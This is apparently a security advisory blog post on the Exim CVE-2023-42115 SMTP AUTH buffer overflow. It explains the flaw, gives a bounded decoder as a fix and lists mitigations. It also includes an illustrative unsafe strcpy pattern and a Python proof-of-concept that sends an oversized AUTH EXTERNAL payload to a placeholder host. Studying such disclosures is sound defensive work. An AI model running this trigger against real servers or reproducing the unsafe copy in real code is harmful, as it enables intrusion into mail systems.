A critical vulnerability has been publicly disclosed in Exim, the popular mail transfer agent (MTA) that runs on millions of servers worldwide. Tracked as CVE-2023-42115 (reported through the Zero Day Initiative as ZDI-CAN-17434), the flaw allows an unauthenticated remote attacker to execute arbitrary code on an affected installation, with no user interaction required.
If your server runs Exim, especially if it is internet-facing, you need to understand this bug, patch your systems, and consider mitigation steps. Here is a simplified breakdown.
What is CVE-2023-42115?
CVE-2023-42115 is an out-of-bounds write vulnerability in Exim's SMTP service, which typically listens on TCP port 25. Specifically, the bug is in the way Exim handles the SMTP AUTH command when the external authenticator (SASL mechanism EXTERNAL) is configured. Exim does not validate the length of the data sent by the remote client before copying it into a fixed-size buffer, so an attacker can write data beyond the end of that buffer.
Impact:
An attacker can trigger the bug simply by sending a crafted SMTP AUTH command, which can lead to code execution with the privileges of the Exim process. In practice that means control of the mail service (reading, altering or relaying mail) and a foothold on the host, a nightmare scenario for mail server admins.
Affected Versions
At the time of writing, Exim 4.96 and all earlier releases are affected when the external authenticator is in use; the fix is in Exim 4.96.1 and 4.97. Distribution packages may carry a backported fix under an older version number, so for exact versions and releases always refer to the official Exim security notices and your vendor's bulletin.
Technical Details
Let’s walk through what’s happening under the hood.
When an SMTP client sends the AUTH command, Exim hands the client-supplied data to the configured authenticator; the flaw is in the external authenticator. Because the length of that data is not checked against the buffer it is copied into, an attacker can craft a line such as:

```
AUTH <mechanism> <very-long-user-supplied-string>
```

In the vulnerable code, something similar to the following occurs (an illustrative pattern, not Exim's actual source):

```c
char buf[256];
/* ... */
strcpy(buf, user_input);  /* UNSAFE: no bounds check on attacker-controlled user_input */
```
When user_input is longer than 256 bytes, the buffer overflows. The attacker can now write controlled data beyond buf, potentially overwriting important control structures, function pointers, or other data — which, in many cases, can lead to remote code execution.
Note: The vulnerable code may actually use memcpy, strncpy, or similar, but the effect remains the same if bounds are not strictly enforced.
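To make the fix concrete, here is an added example (written for this article, not Exim's own code) of a server-side AUTH handler that base64-decodes the client's initial response into a fixed 256-byte buffer. The buffer size, the `AUTH_BUF_SIZE`/`MECH_MAX` names and the `probe_*` helpers are assumptions for illustration; the point is the `out >= dst_len` check inside the decoder, which refuses the input the moment one more byte would land outside the buffer. Omit that single check and you have the overflow described above.

```c
/* Added illustrative example, not Exim source: decode "AUTH <mech> <base64>"
 * into a fixed buffer, rejecting (not truncating) oversized input. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define AUTH_BUF_SIZE 256   /* hypothetical fixed buffer, as in the text */
#define MECH_MAX      20    /* SASL mechanism names are 1..20 characters */

enum auth_status { AUTH_OK = 0, AUTH_BAD_SYNTAX = -1, AUTH_TOO_LONG = -2 };

static int b64_value(char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode base64 into dst, never writing more than dst_len bytes.
 * Returns the decoded length, or AUTH_BAD_SYNTAX / AUTH_TOO_LONG. */
static long b64_decode_bounded(const char *src, size_t src_len,
                               unsigned char *dst, size_t dst_len)
{
    uint32_t acc = 0;
    int bits = 0;
    size_t out = 0;

    for (size_t i = 0; i < src_len; i++) {
        if (src[i] == '=')              /* padding: nothing more to decode */
            break;
        int v = b64_value(src[i]);
        if (v < 0)
            return AUTH_BAD_SYNTAX;
        acc = (acc << 6) | (uint32_t)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (out >= dst_len)         /* would write past the buffer: refuse */
                return AUTH_TOO_LONG;
            dst[out++] = (unsigned char)((acc >> bits) & 0xff);
        }
    }
    return (long)out;
}

/* Parse one AUTH command line (CRLF already stripped). Copies the mechanism
 * name into mech and the decoded initial response into param; returns the
 * decoded length, or a negative auth_status. Nothing is written outside param. */
long handle_auth_line(const char *line, char mech[MECH_MAX + 1],
                      unsigned char param[AUTH_BUF_SIZE])
{
    if (strncmp(line, "AUTH ", 5) != 0)
        return AUTH_BAD_SYNTAX;
    const char *p = line + 5;
    const char *sp = strchr(p, ' ');
    size_t mech_len = sp ? (size_t)(sp - p) : strlen(p);
    if (mech_len == 0 || mech_len > MECH_MAX)
        return AUTH_BAD_SYNTAX;
    memcpy(mech, p, mech_len);
    mech[mech_len] = '\0';
    if (!sp)                            /* no initial response is legal */
        return 0;
    return b64_decode_bounded(sp + 1, strlen(sp + 1), param, AUTH_BUF_SIZE);
}

/* Convenience wrapper with local buffers, for exercising the handler. */
long probe_auth_line(const char *line)
{
    char mech[MECH_MAX + 1];
    unsigned char param[AUTH_BUF_SIZE];
    return handle_auth_line(line, mech, param);
}

/* Build "AUTH EXTERNAL " + base64 of n_bytes bytes of 'A' (the constructed
 * payload from the PoC below) and feed it to the handler.
 * n_bytes must be a multiple of 3 and at most 1024. */
long probe_auth_payload(size_t n_bytes)
{
    char line[16 + 4 * (1024 / 3) + 1];
    size_t off = 0;
    if (n_bytes > 1024 || n_bytes % 3 != 0)
        return AUTH_BAD_SYNTAX;
    memcpy(line, "AUTH EXTERNAL ", 14);
    off = 14;
    for (size_t i = 0; i < n_bytes / 3; i++) {   /* "AAA" encodes as "QUFB" */
        memcpy(line + off, "QUFB", 4);
        off += 4;
    }
    line[off] = '\0';
    return probe_auth_line(line);
}
```

Note that the check is applied to the decoded length, not the length of the base64 text on the wire: 300 payload bytes arrive as 400 base64 characters, and it is the 300 decoded bytes that must fit in the buffer. Rejecting with an error is preferable to silently truncating, which would hide the attack attempt from the server's logs.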
Proof-of-Concept (PoC) – Python Snippet
```python
import base64
import socket

TARGET = ("victim.com", 25)  # placeholder; only test against systems you are authorised to attack
payload = b"A" * 300           # longer than the hypothetical 256-byte buffer
# The server base64-decodes the initial response back to 300 bytes before copying it.
# The vulnerable code path is the EXTERNAL authenticator.
auth_line = b"AUTH EXTERNAL " + base64.b64encode(payload) + b"\r\n"

with socket.create_connection(TARGET, timeout=10) as s:
    print(s.recv(1024))                          # 220 banner
    s.sendall(b"EHLO test.example\r\n")          # Exim only accepts AUTH after EHLO, once advertised
    ehlo = s.recv(4096)
    print(ehlo)
    if b"AUTH" not in ehlo:
        raise SystemExit("server does not advertise AUTH; this path is not reachable")
    s.sendall(auth_line)
    print(s.recv(1024))
```
*Note: Actual exploitation may require more subtle crafting, depending on system memory layout and mitigations, but this demonstrates the attack vector.*
Mitigation
1. *Upgrade to a fixed Exim release (4.96.1 or 4.97 and later), or to a vendor package that carries the backported fix.*
2. *Review vendor bulletins and the official Exim security page.*
3. *If you cannot upgrade immediately, stop offering the EXTERNAL authenticator so the vulnerable code path cannot be reached from the network.*
References and Further Reading
- Zero Day Initiative Advisory
- Exim Official Security History
- NVD Entry for CVE-2023-42115
- Exim GitHub Repo
Conclusion
CVE-2023-42115 is a reminder that essential internet services like mail servers remain high-priority targets for attackers. Buffer overflows, even in mature codebases, can lead to catastrophic breaches. If you run Exim, patch immediately — and review your mail system architecture to minimize the blast radius of any future vulnerabilities.
Timeline
Published on: 05/03/2024 03:15:50 UTC